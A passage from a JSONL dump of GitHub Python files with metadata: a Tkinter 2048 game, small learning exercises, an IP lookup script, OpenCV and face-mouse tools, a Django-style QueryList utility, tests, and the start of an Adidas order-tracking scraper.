fg=\"#faf5ef\",\r\n bg=\"#776e65\",\r\n command=self.undo,\r\n relief=FLAT)\r\n und.place(x=227, y=80, width=33, height=20)\r\n res = Button(\r\n self.root,\r\n text=\"New\",\r\n width=32,\r\n height=4,\r\n font=(\r\n \"Arial\",\r\n 8,\r\n \"bold\"),\r\n fg=\"#faf5ef\",\r\n bg=\"#776e65\",\r\n command=self.restart,\r\n relief=FLAT)\r\n res.place(x=264, y=80, width=30, height=20)\r\n self.gmde = Button(\r\n self.root,\r\n text=\"3x3\",\r\n width=32,\r\n height=4,\r\n font=(\r\n \"Arial\",\r\n 8,\r\n \"bold\"),\r\n fg=\"#faf5ef\",\r\n bg=\"#776e65\",\r\n command=self.change_mode,\r\n relief=FLAT)\r\n self.gmde.place(x=298, y=80, width=27, height=20)\r\n\r\n self.set_board()\r\n\r\n self.root.mainloop()\r\n\r\n def set_board(self):\r\n self.screen = LabelFrame(self.root, bg=Colours.bord_colour, bd=0)\r\n self.screen.place(x=20, y=115, width=305, height=305)\r\n self.objective2[\"text\"] = str(self.board.num) + \" tile!\"\r\n\r\n if self.board.size == 3:\r\n self.game_name_3x3[\"text\"] = \"3x3\"\r\n else:\r\n self.game_name_3x3[\"text\"] = \"\"\r\n tl = Colours.tile_len[self.board.size]\r\n\r\n self.values = [[0 for i in range(self.board.size)]\r\n for j in range(self.board.size)]\r\n for indrow, row in enumerate(self.board.game_matrix):\r\n for indcol, col in enumerate(row):\r\n ele = Label(self.screen)\r\n self.values[indrow][indcol] = ele\r\n ele.place(x=5 + indcol * (tl + 5), y=5 +\r\n indrow * (tl + 5), width=tl, height=tl)\r\n\r\n self.display_board()\r\n\r\n self.arrow_keys = {\r\n \"Up\": self.board.moveup,\r\n \"Down\": self.board.movedown,\r\n \"Right\": self.board.moveright,\r\n \"Left\": self.board.moveleft}\r\n self.root.bind(\"\", self.moves)\r\n\r\n def display_board(self):\r\n self.score_value[\"text\"] = str(self.board.score)\r\n for indrow, row in enumerate(self.board.game_matrix):\r\n for indcell, cell in enumerate(row):\r\n if cell == 0:\r\n self.values[indrow][indcell][\"text\"] = \"\"\r\n self.values[indrow][indcell][\"bg\"] = Colours.emp_cell_colour\r\n else:\r\n self.values[indrow][indcell][\"text\"] = cell\r\n self.values[indrow][indcell][\"fg\"] = Colours.num_colour[cell]\r\n self.values[indrow][indcell][\"bg\"] = Colours.cell_colour[cell]\r\n self.values[indrow][indcell][\"font\"] = Colours.num_font[self.board.size][cell]\r\n\r\n self.hi_sc()\r\n\r\n def game_status(self):\r\n if self.board.game_won() or self.board.game_over():\r\n self.root.unbind(\"\")\r\n if self.board.game_won():\r\n self.text1 = \"You Won!\\nDo you want to continue?\"\r\n else:\r\n self.text1 = \"Game Over!\\nDo you want to play again?\"\r\n\r\n self.game_status_frame = LabelFrame(self.root, bg=\"#faf5ef\", bd=0)\r\n self.game_status_frame.place(x=50, y=220, width=245, height=95)\r\n\r\n game_status_label = Label(\r\n self.game_status_frame,\r\n text=self.text1,\r\n fg=\"#776e65\",\r\n bg=\"#faf5ef\",\r\n font=(\r\n \"Arial\",\r\n 12,\r\n \"bold\"))\r\n game_status_label.place(x=12, y=9, width=220, height=40)\r\n\r\n yes_button = Button(\r\n self.game_status_frame,\r\n text=\"Yes\",\r\n fg=\"#faf5ef\",\r\n bg=Colours.button_colour,\r\n command=self.yes,\r\n font=(\r\n \"Sans Serif\",\r\n 9,\r\n \"bold\"),\r\n relief=FLAT)\r\n yes_button.place(x=85, y=55, width=35, height=25)\r\n\r\n no_button = Button(\r\n self.game_status_frame,\r\n text=\"No\",\r\n fg=\"#faf5ef\",\r\n bg=Colours.button_colour,\r\n command=self.root.destroy,\r\n font=(\r\n \"Sans Serif\",\r\n 9,\r\n \"bold\"),\r\n relief=FLAT)\r\n no_button.place(x=125, y=55, width=35, height=25)\r\n\r\n def hi_sc(self):\r\n with open(\"High Score.txt\") as f:\r\n high_scores = f.read().split()\r\n self.hi_score = high_scores[self.board.size - 3]\r\n with open(\"High Score.txt\", \"w\") as f:\r\n if int(self.hi_score) < self.board.score:\r\n self.hi_score = str(self.board.score)\r\n self.hsc_value[\"text\"] = high_scores[self.board.size -\r\n 3] = self.hi_score\r\n high_scores = \"\\n\".join(high_scores)\r\n f.write(high_scores)\r\n\r\n def yes(self):\r\n self.game_status_frame.destroy()\r\n if self.board.game_won():\r\n self.board.num *= 2\r\n self.root.bind(\"\", self.moves)\r\n self.objective2[\"text\"] = str(self.board.num) + \" tile!\"\r\n if self.board.game_over():\r\n self.screen.destroy()\r\n self.board.__init__(self.board.size)\r\n self.set_board()\r\n\r\n def restart(self):\r\n self.screen.destroy()\r\n self.board.__init__(self.board.size)\r\n self.set_board()\r\n\r\n def undo(self):\r\n if self.board.game_over():\r\n self.game_status_frame.destroy()\r\n self.root.bind(\"\", self.moves)\r\n if len(self.board.gamematrix_undo) >= 1:\r\n self.board.game_matrix = self.board.gamematrix_undo.pop()\r\n self.board.score = self.board.score_undo.pop()\r\n self.display_board()\r\n\r\n def change_mode(self):\r\n if self.board.size == 4:\r\n self.board.size = 3\r\n self.gmde[\"text\"] = \"4x4\"\r\n else:\r\n self.board.size = 4\r\n self.gmde[\"text\"] = \"3x3\"\r\n self.screen.destroy()\r\n self.board.__init__(self.board.size)\r\n self.set_board()\r\n self.hsc_value[\"text\"] = self.hi_score\r\n\r\n def moves(self, event):\r\n if event.keysym in self.arrow_keys:\r\n self.arrow_keys[event.keysym]()\r\n self.display_board()\r\n self.game_status()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n board = Board(4)\r\n game = Game(board)\r\n","repo_name":"Nigel007/Python-Tkinter","sub_path":"2048/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":9609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14377815222","text":"'''\nПодвиг 3.\nВводится таблица целых чисел.\nИспользуя функцию map и генератор списков,\nпреобразуйте список строк lst_in (см. листинг)\nв двумерный список с именем lst2D, содержащий целые числа.\nВыводить на экран ничего не нужно,\nтолько сформировать список lst2D на основе введенных данных.\nSample Input:\n8 11 -5\n3 4 10\n-1 -2 3\n4 5 6\nSample Output:\nTrue\n'''\n\n\n\n\nimport sys\ntest_str = \"8 11 -5\" \\\n \"3 4 10\" \\\n \"-1 -2 3\" \\\n \"4 5 6\"\nlst_in = list(map(str.strip, sys.stdin.readlines()))\nlst2D = map(str.split, lst_in)\nprint(lst_in)\nprint(lst2D)\n\nlst_test = []\nfor x in lst2D:\n lst_temp = []\n for y in x:\n lst_temp.append(int(y))\n lst_test.append(lst_temp)\nprint(lst_test)\n\ng = [list(int(y) for y in x) for x in map(str.split,lst_in)]\ng_2 = [list(map(int, x.split())) for x in lst_in]\nprint(g)\n","repo_name":"JakiffCousto/Course_Stepik_Python_Sergey_Balakirev","sub_path":"9_3_map/9_3_3.py","file_name":"9_3_3.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35045475273","text":"import requests\n\n# Prompt the user to enter the IP address\nip_address = input(\"Enter the IP address: \")\n\n# Construct the API URL with the user-provided IP address\napi_url = f\"https://api.api-ninjas.com/v1/iplookup?address={ip_address}\"\n\n# Make the API request\nresponse = requests.get(api_url, headers={\"X-Api-Key\": \"KEY\"})\n\n# Process the API response\nif response.status_code == 200:\n data = response.json()\n if \"country\" in data:\n print(\"Country:\", data[\"country\"])\n else:\n print(\"Country information not available.\")\n \n if \"region\" in data:\n print(\"Region:\", data[\"region\"])\n else:\n print(\"Region information not available.\")\n \n if \"city\" in data:\n print(\"City:\", data[\"city\"])\n else:\n print(\"City information not available.\")\n \n if \"latitude\" in data and \"longitude\" in data:\n print(\"Latitude:\", data[\"latitude\"])\n print(\"Longitude:\", data[\"longitude\"])\n else:\n print(\"Latitude and longitude information not available.\")\n \n # ... add more fields as needed\nelse:\n print(\"Error:\", response.status_code, response.text)\n","repo_name":"Kaiasaurin/Python-Projects","sub_path":"IP Lookup.py","file_name":"IP Lookup.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"38984200177","text":"import importlib\nimport inspect\nimport logging\nimport os\nimport sys\nimport time\nimport traceback\nfrom datetime import datetime\nfrom selenium import webdriver\nsys.path.append('.')\nimport of_spider\n\ndef sleep(seconds):\n time.sleep(seconds)\n\ndef create_chrome_driver():\n options = webdriver.ChromeOptions()\n # options.add_argument('--headless')\n # options.add_argument('--disable-gpu')\n options.add_argument('--ignore-certificate-errors')\n # prefs = {'profile.managed_default_content_settings.images': 2}\n # options.add_experimental_option('prefs',prefs)\n driver = webdriver.Chrome(chrome_options=options)\n driver.maximize_window()\n return driver\n\ndef find_element_by_css_selector(element, selector):\n try:\n return element.find_element_by_css_selector(selector)\n except:\n return None\n\ndef find_elements_by_css_selector(element, selector):\n try:\n return element.find_elements_by_css_selector(selector)\n except:\n return []\n \ndef create_flogger(filename, level=logging.INFO):\n logger = logging.getLogger(filename)\n logger.setLevel(level)\n dt = datetime.now()\n fh = logging.FileHandler(filename + '_' + dt.strftime('%Y-%m-%d') + '_' + str(os.getpid()) + '.log')\n fh.setLevel(level)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n return logger\n\ndef get_domain(url):\n return url.split('://')[1].split('/')[0]\n\ndef load_spiders(path, logger):\n spiders = {}\n files = os.listdir(path)\n for f in files:\n f_path = os.path.join(path, f)\n if os.path.isfile(f_path) and \\\n (not f.startswith('__init__')) and \\\n f.endswith('.py'):\n mod = importlib.import_module('%s.%s' % (path, f[:-3]))\n for var in dir(mod):\n obj = getattr(mod, var)\n try:\n if issubclass(obj, of_spider.Spider):\n var = var.lower()\n spiders[var] = obj(logger)\n except:\n pass\n return spiders\n\ndef get_base_url(url):\n return url.split('?')[0]\n\ndef get_url_parameters(url):\n parameters = {}\n kvs = url.split('?')[-1].split('&')\n for kv in kvs:\n k, v = kv.split('=')\n parameters[k] = v\n return parameters\n\ndef convert_price(price):\n try:\n return int(float(price.replace('¥','').replace('¥','').replace(',','').replace('人民币','').replace('RMB','').replace('CNY','')))\n except Exception as e:\n print(e)\n return 0\n\ndef find_element_by_xpath(element, selector):\n try:\n return element.find_element_by_xpath(selector)\n except:\n return None\n\ndef find_elements_by_xpath(element, selector):\n try:\n return element.find_elements_by_xpath(selector)\n except:\n return []","repo_name":"yingl/ofashion_spider","sub_path":"of_utils.py","file_name":"of_utils.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"33315665316","text":"#!/usr/bin/python3\n\"\"\" module for defining the fetch first state module \"\"\"\n\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\nfrom sys import argv\n\nif __name__ == \"__main__\":\n usr = argv[1]\n pwd = argv[2]\n db_ = argv[3]\n\n engine = create_engine(f\"mysql+mysqldb://{usr}:{pwd}@localhost/{db_}\")\n\n session = Session(engine)\n\n state = session.query(State).first()\n\n if state:\n print(f\"1: {state.name}\")\n else:\n print(\"Nothing\")\n\n session.close()\n","repo_name":"adaptingadapting/holbertonschool-higher_level_programming","sub_path":"python-object_relational_mapping/8-model_state_fetch_first.py","file_name":"8-model_state_fetch_first.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74790343603","text":"import util\n\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first.\n\n Your search algorithm needs to return a list of actions that reaches the\n goal. Make sure to implement a graph search algorithm.\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n\n class SearchNode:\n \"\"\"\n Creates node: \n \"\"\"\n\n def __init__(self, state, action=None, parent=None):\n self.state = state\n self.action = action\n self.parent = parent\n\n def extract_solution(self):\n \"\"\"Gets complete path from goal state to parent node\"\"\"\n action_path = []\n search_node = self\n while search_node:\n if search_node.action:\n action_path.append(search_node.action)\n search_node = search_node.parent\n return list(reversed(action_path))\n\n start_node = SearchNode(problem.getStartState())\n\n if problem.isGoalState(start_node.state):\n return start_node.extract_solution()\n\n frontier = util.Stack()\n explored = set()\n frontier.push(start_node)\n\n # run until stack is empty\n while not frontier.isEmpty():\n node = frontier.pop() # choose the deepest node in frontier\n explored.add(node.state)\n\n if problem.isGoalState(node.state):\n return node.extract_solution()\n\n # expand node\n successors = problem.getSuccessors(node.state)\n\n for succ in successors:\n # make-child-node\n child_node = SearchNode(succ[0], succ[1], node)\n if child_node.state not in explored:\n frontier.push(child_node)\n\n # no solution\n util.raiseNotDefined()\n","repo_name":"lucassoni/ia","sub_path":"proj1/tinyMazeSearch.py","file_name":"tinyMazeSearch.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14101979857","text":"import cv2\nimport numpy as np\n\ndef nothing(x):\n pass\n\ncanvas = np.zeros((512,512,3), dtype=np.uint8) # siyah tuval oluşturuyoruz\n\ncv2.namedWindow(\"image\") #pencere adımız\n\ncv2.createTrackbar(\"R\",\"image\",0,255,nothing)\ncv2.createTrackbar(\"G\",\"image\",0,255,nothing)\ncv2.createTrackbar(\"B\",\"image\",0,255,nothing) #tuvaller için kızakları olan trackbarlar oluşturuyoruz\ncv2.createTrackbar(\"Switch\",\"image\",0,1,nothing)\n\nwhile True:\n cv2.imshow(\"image\", canvas) # penceriyi görmemizi sağlar\n if cv2.waitKey(1) & 0xFF == ord(\"q\"): # klavyeden q harfine basılınca kapanmasını sağlar\n break\n s =cv2.getTrackbarPos(\"Switch\",\"image\")\n r=cv2.getTrackbarPos(\"R\",\"image\") #trackbarın içindeki kızağın pozisyonunu çekmek için\n g = cv2.getTrackbarPos(\"G\", \"image\")\n b = cv2.getTrackbarPos(\"B\", \"image\")\n\n if s==1 : #switch 1 ise kızaklarıdaki değişikler okunur\n canvas[:]=[b,g,r] #kızaklardaki alınan değerleri r g b değerlerine atamasını sağlar\n else :\n canvas[:] = [0, 0, 0]\n","repo_name":"curavite/Trackbar_applications01","sub_path":"deneme.py","file_name":"deneme.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"45974439554","text":"from bz2file import BZ2File\nfrom wiktionary_de_parser import Parser\nimport json\nimport sys\n\nf = open(\"wiktionary-lookupable.txt\", \"r\")\nrecords = json.loads(f.read())\nf.close()\n\nw = sys.argv[1]\nftype = sys.argv[2]\n\nflexion = set()\n\ndef lookup(c):\n if ftype == \"verb\" and 'Präsens_ich' in c['flexion']:\n for k in c['flexion']:\n if k != 'Hilfsverb':\n flexion.add(c['flexion'][k])\n elif ftype == \"adj\" and 'Komparativ' in c['flexion']:\n for k in c['flexion']:\n flexion.add(c['flexion'][k])\n\nfor c in records[w]:\n if 'flexion' not in c:\n if 'lemma' in c:\n w2 = c['lemma']\n for c2 in records[w2]:\n if 'flexion' in c2:\n lookup(c2)\n else:\n lookup(c)\n\nfor s in flexion:\n print(s)\n","repo_name":"murliwatz/2021-emotion-detection-from-german-texts","sub_path":"misc-scripts/extractors/wiktionary-extract-flexion.py","file_name":"wiktionary-extract-flexion.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34666838940","text":"import unittest\nfrom main import create_app, db\nfrom models.Profiles import Profiles\n\nclass TestProfiles(unittest.TestCase):\n @classmethod\n def setUp(cls):\n cls.app = create_app()\n cls.app_context = cls.app.app_context()\n cls.app_context.push()\n cls.client = cls.app.test_client()\n db.create_all()\n runner = cls.app.test_cli_runner()\n runner.invoke(args=[\"db\", \"seed\"])\n\n @classmethod\n def tearDown(cls):\n db.session.remove()\n db.drop_all()\n cls.app_context.pop()\n\n\n\n\n def test_profiles_index(self):\n response= self.client.get(\"/profiles/\")\n\n data = response.get_json()\n\n self.assertEqual(response.status_code, 200)\n self.assertIsInstance(data, list)\n\n def test_profiles_create(self):\n response = self.client.post(\"/profiles/\", json={\n \"email\": \"Test Email\",\n \"fname\": \"Test Name\",\n \"github\": \"Test Github\",\n \"lname\": \"Test Name\",\n \"profile_pic\":\"Test Profile Pic\",\n \"username\": \"Test UserName\",\n \"userpass\":\"Test Password\",\n \"account_active\":\"True\"\n })\n\n data = response.get_json()\n\n self.assertEqual(response.status_code, 200)\n\n self.assertIsInstance(data, dict)\n self.assertTrue(bool(\"userid\" in data.keys()))\n\n profiles = Profiles.query.get(data[\"userid\"])\n self.assertIsNotNone(profiles)\n\n def test_profiles_delete(self):\n profiles = Profiles.query.first()\n\n response = self.client.delete(f\"/profiles/{profiles.userid}\")\n data = response.get_json()\n\n self.assertEqual(response.status_code, 200)\n\n profiles = Profiles.query.get(profiles.userid)\n self.assertIsNone(profiles)","repo_name":"Karen-Stewart80/Code-Connect-Collaborate","sub_path":"src/tests/test_profiles.py","file_name":"test_profiles.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71235554803","text":"from erp5.component.module.Log import log\nlog('Launching activities to setup the demo configuration!')\n\nkw = {}\ninstalled_business_template_list = context.portal_templates.getInstalledBusinessTemplateTitleList()\n\nif 'erp5_configurator_standard' not in installed_business_template_list:\n kw = context.Alarm_installBusinessTemplateList()\n\nlog('Finished to launch the activities to setup the demo configuration!')\ncontext.setEnabled(False)\n","repo_name":"Nexedi/erp5","sub_path":"bt5/erp5_demo_smb/SkinTemplateItem/portal_skins/erp5_demo_smb/Alarm_setupDemoConfiguration.py","file_name":"Alarm_setupDemoConfiguration.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"34242407979","text":"from libtiff import TIFF\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n# 读取夜间灯光数据\r\ntif = TIFF.open('F182013.v4c.avg_lights_x_pct\\F182013.v4c.avg_lights_x_pct.tif', mode='r')\r\nimg = tif.read_image()\r\nheight = img.shape[0]\r\nwidth = img.shape[1]\r\n# plt.imshow(img)\r\n# plt.show()\r\n# 提取包含中国东部范围的夜间灯光数据画图\r\n# 夜灯数据覆盖范围为-65~75oN,-180-180oN,分辨率是30’\r\nlons = 100\r\nlone = 137\r\nlats = -15\r\nlate = 15\r\nlons_grid = int((lons+180) / (30.0 / 3600))\r\nlone_grid = int((lone+180) / (30.0 / 3600))\r\nlats_grid = int((70 + lats) / (30.0 / 3600))\r\nlate_grid = int((70 + late) / (30.0 / 3600))\r\nprint(lats_grid,late_grid, lons_grid,lone_grid)\r\nprint(lats_grid*(30.0 / 3600),late_grid*(30.0 / 3600), lons_grid*(30.0 / 3600),lone_grid*(30.0 / 3600))\r\nimg2 = img[lats_grid:late_grid, lons_grid:lone_grid]\r\nplt.imshow(img2)\r\nplt.show()","repo_name":"SmartImagingLab/Observation-Simulator-and-RL-algorithms","sub_path":"map/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29789917361","text":"import cv2\nimport pyautogui\nimport threading\nimport optionWindow\nimport win32api, win32con\nimport time\n\n\nclass Mouse:\n def __init__(self, face_mouse_detector, left_click_sens=0.96, right_click_sens=0.96,\n mouse_vertical_sens=-100, mouse_horizontal_sens=40,\n nose_vertical_pos=+0.00, nose_horizontal_pos=0,\n idle_movement_range=0.035, acceleration_effect=1.5):\n self.cap = cv2.VideoCapture(1)\n self.faceMouseDetector = face_mouse_detector\n self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, 480)\n self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 360)\n\n self.left_click_sensitivity = left_click_sens\n self.right_click_sensitivity = right_click_sens\n self.mouse_vertical_sensitivity = mouse_vertical_sens\n self.mouse_horizontal_sensitivity = mouse_horizontal_sens\n self.nose_horizontal_pos = nose_horizontal_pos\n self.nose_vertical_pos = nose_vertical_pos\n self.idle_movement_range = idle_movement_range\n self.acceleration_effect = acceleration_effect\n\n self.vertical_velocity = 0.0\n self.horizontal_velocity = 0.0\n\n self.window = optionWindow.OptionWindow(self)\n\n self.shouldWork = True\n pyautogui.FAILSAFE = False\n\n def camera_read_and_analyse(self):\n ret, frame = self.cap.read()\n if ret:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n self.window.update_camera(frame)\n return self.faceMouseDetector.detect(frame)\n\n def run(self):\n mover = threading.Thread(target=self.mouse_movement)\n mover.start()\n while self.shouldWork:\n ans = self.camera_read_and_analyse()\n if ans is None:\n continue\n blink, move = ans\n if blink[0] > self.left_click_sensitivity:\n # pyautogui.click()\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0)\n time.sleep(0.02)\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0)\n self.window.click_left()\n if blink[1] > self.right_click_sensitivity:\n pyautogui.click(button='right')\n self.window.click_right()\n\n if abs(move[0]) > self.idle_movement_range:\n self.horizontal_velocity = self.mouse_horizontal_sensitivity * (move[0] - self.nose_horizontal_pos)\n self.horizontal_velocity *= abs(self.horizontal_velocity) ** self.acceleration_effect\n # This creates square relation between movement of the face and velocity of the cursor - helps\n else:\n self.horizontal_velocity = 0\n if abs(move[1]) > self.idle_movement_range:\n self.vertical_velocity = self.mouse_vertical_sensitivity * (move[1] - self.nose_vertical_pos)\n self.vertical_velocity *= abs(self.vertical_velocity) ** self.acceleration_effect\n # This creates square relation between movement of the face and velocity of the cursor - helps\n else:\n self.vertical_velocity = 0\n\n self.kill(mover)\n self.window.exit_window()\n\n def mouse_movement(self):\n start_time = cv2.getTickCount()\n end_time = cv2.getTickCount()\n while self.shouldWork:\n delta_time = (end_time - start_time) / cv2.getTickFrequency()\n start_time = cv2.getTickCount()\n pyautogui.move(int(self.horizontal_velocity * delta_time), int(self.vertical_velocity * delta_time))\n end_time = cv2.getTickCount()\n\n def kill(self, mover):\n self.cap.release()\n cv2.destroyAllWindows()\n mover.join()\n\n #################################\n ############ Setters ############\n #################################\n\n '''left_click_sens = 0.96, right_click_sens = 0.96,\n mouse_vertical_sens = -100, mouse_horizontal_sens = 40,\n nose_vertical_pos = +0.00, nose_horizontal_pos = 0,\n idle_movement_range = 0.035, acceleration_effect = 1.5'''\n\n def set_left_click_sens(self, val):\n self.left_click_sensitivity = val\n\n def set_right_click_sens(self, val):\n self.right_click_sensitivity = val\n\n def set_mouse_vertical_sens(self, val):\n self.mouse_vertical_sensitivity = val\n\n def set_mouse_horizontal_sens(self, val):\n self.mouse_horizontal_sensitivity = val\n\n def set_nose_vertical_pos(self, val):\n self.nose_vertical_pos = val\n\n def set_nose_horizontal_pos(self, val):\n self.nose_horizontal_pos = val\n\n def set_idle_movement_range(self, val):\n self.idle_movement_range = val\n\n def set_acceleration_effect(self, val):\n self.acceleration_effect = val\n","repo_name":"triggeredtrebuchet/face_mouse","sub_path":"faceMouse/faceMouse.py","file_name":"faceMouse.py","file_ext":"py","file_size_in_byte":4740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36341745999","text":"import os\nfrom schematics.transforms import export_loop, whitelist\nimport csv, os\n\n\nclass RolesFromCsv(dict):\n def __init__(self, path, relative_to=__file__):\n super(RolesFromCsv, self).__init__(())\n self.base_dir = os.path.dirname(os.path.abspath(relative_to))\n with open(os.path.join(self.base_dir, path)) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n self[row[\"rolename\"]] = whitelist(*[k for k in row if k != \"rolename\" and row[k]])\n","repo_name":"ProzorroUKR/openprocurement.api","sub_path":"src/openprocurement/api/roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"75"} +{"seq_id":"69917179444","text":"import operator\nfrom copy import deepcopy\nfrom typing import Callable, Any\n\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\n\n\nclass QueryList(list):\n \"\"\"A list that you can filter like a Django QuerySet\"\"\"\n\n # registry of double-underscore method names and the functions they map to\n operations = (\n (\"lt\", operator.lt),\n (\"lte\", operator.le),\n (\"gt\", operator.gt),\n (\"gte\", operator.ge),\n (\"contains\", operator.contains),\n (\"in\", lambda a, b: a in b),\n (\"len\", lambda a, b: len(a) == b),\n )\n\n # functions (mostly builtins) that can get some value of an item.\n attribute_getters = (\n (\"len\", len),\n (\"bool\", bool),\n (\"max\", max),\n (\"min\", min),\n (\"all\", all),\n (\"any\", any),\n (\"abs\", abs),\n (\"sum\", sum),\n )\n\n def all(self) -> list:\n return list(deepcopy(self))\n\n def exists(self) -> bool:\n return bool(self)\n\n def first(self) -> Any:\n return self[0] if self.exists() else None\n\n def last(self) -> Any:\n return self[-1] if self.exists() else None\n\n def count(self) -> int:\n return len(self)\n\n def filter(self, **kwargs) -> \"QueryList\":\n func = lambda item: self._match_item(item, **kwargs)\n return self.__class__(filter(func, self))\n\n def exclude(self, **kwargs) -> \"QueryList\":\n func = lambda item: not self._match_item(item, **kwargs)\n return self.__class__(filter(func, self))\n\n def get(self, **kwargs) -> Any:\n qs = self.filter(**kwargs)\n if len(qs) == 0:\n raise ObjectDoesNotExist\n if len(qs) > 1:\n raise MultipleObjectsReturned\n return qs[0]\n\n def order_by(self, *fields: str) -> \"QueryList\":\n class comparer:\n \"\"\"\n Thin wrapper around an item that allows us to reverse the sorting on a per-field\n basis. Credit to black panda:\n https://stackoverflow.com/questions/37693373/how-to-sort-a-list-with-two-keys-but-one-in-reverse-order\n \"\"\"\n\n def __init__(self, value: Any, reverse: bool):\n self.value = value\n self.reverse = reverse\n\n def __eq__(self, other):\n return other.value == self.value\n\n def __lt__(self, other):\n if self.reverse:\n return other.value < self.value\n else:\n return self.value < other.value\n\n def comparison_func(item):\n \"\"\"Returns a tuple of attributes of the item which `sorted` will use to compare it\n against its peers\"\"\"\n return tuple(\n comparer(\n self._recursive_get_attribute(item, field.lstrip(\"-\")),\n reverse=field.startswith(\"-\"),\n )\n for field in fields\n )\n\n return self.__class__(sorted(self, key=comparison_func))\n\n @classmethod\n def register_operation(cls, name: str, function: Callable):\n \"\"\"\n Register a new operation that can be triggered with a dunder query parameter. Name should\n be the name of the operation after the \"__\".\n\n So if you want to be able to do .filter(name__islongerthan=5), you should do:\n\n def is_longer_than(item, target_length):\n return len(item) > target_length\n\n QuerySet.register(\"islongerthan\", is_longer_than)\n \"\"\"\n cls.operations += ((name, function),)\n\n @classmethod\n def register_attribute_getter(cls, name: str, function: Callable):\n cls.attribute_getters += ((name, function),)\n\n @classmethod\n def _match_item(cls, item: Any, **search_terms) -> bool:\n \"\"\"\n The search_terms are the search terms given to filter/exclude/get.\n The item is one of the items in the QueryList.\n This function decides whether the item matches the search terms.\n \"\"\"\n for query, value in search_terms.items():\n key, operation = cls._map_operation(query)\n attribute = cls._recursive_get_attribute(item, key)\n if not operation(attribute, value):\n return False\n return True\n\n @classmethod\n def _get_attribute(cls, item: Any, attribute: str) -> Any:\n \"\"\"Get the value off an item with either [\"dict key lookup\"] or .dot_lookup\"\"\"\n return item[attribute] if isinstance(item, dict) else getattr(item, attribute)\n\n @classmethod\n def _recursive_get_attribute(cls, item: Any, query: str) -> Any:\n attributes = query.split(\"__\")\n for attribute in attributes:\n if attribute in dict(cls.attribute_getters):\n func = dict(cls.attribute_getters)[attribute]\n item = func(item)\n else:\n item = cls._get_attribute(item, attribute)\n return item\n\n @classmethod\n def _map_operation(cls, query: str) -> tuple[str, Callable]:\n \"\"\"\n Fetch the key (parameter name) and operation (a function) given a query parameter.\n\n The default operator is equality (=)\n E.g. if query=\"name\" -> key=\"name\", operator=operator.eq\n\n If the query contains dunders (__) we attempt to fetch the relevant operation from the\n class' operations registry.\n E.g. if query=\"name__contains\" -> key=\"name\", operation=operator.contains\n \"\"\"\n # defaults\n operation = operator.eq\n key = query\n\n if \"__\" in query:\n first_parts, dunder_operation = query.rsplit(\"__\", maxsplit=1)\n operations = dict(cls.operations)\n if dunder_operation in operations:\n operation = operations[dunder_operation]\n key = first_parts\n return key, operation\n","repo_name":"binnev/redbreast","sub_path":"redbreast/querylist.py","file_name":"querylist.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40096695402","text":"import requests, json\nfrom bs4 import BeautifulSoup as bs\n\n\ndef orderchecker(ordernum, email):\n s = requests.Session()\n s.headers['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'\n res = s.get('https://www.adidas.com/us/order-tracker')\n soup = bs(res.text, 'lxml')\n posturl = soup.find('form', {'id':'dwfrm_ordersignup'})['action']\n payload = {\n 'dwfrm_ordersignup_orderNo' : ordernum.upper(),\n 'dwfrm_ordersignup_email' : email,\n 'dwfrm_ordersignup_signup' : 'Track order'\n }\n res = s.post(posturl, data = payload)\n soup = 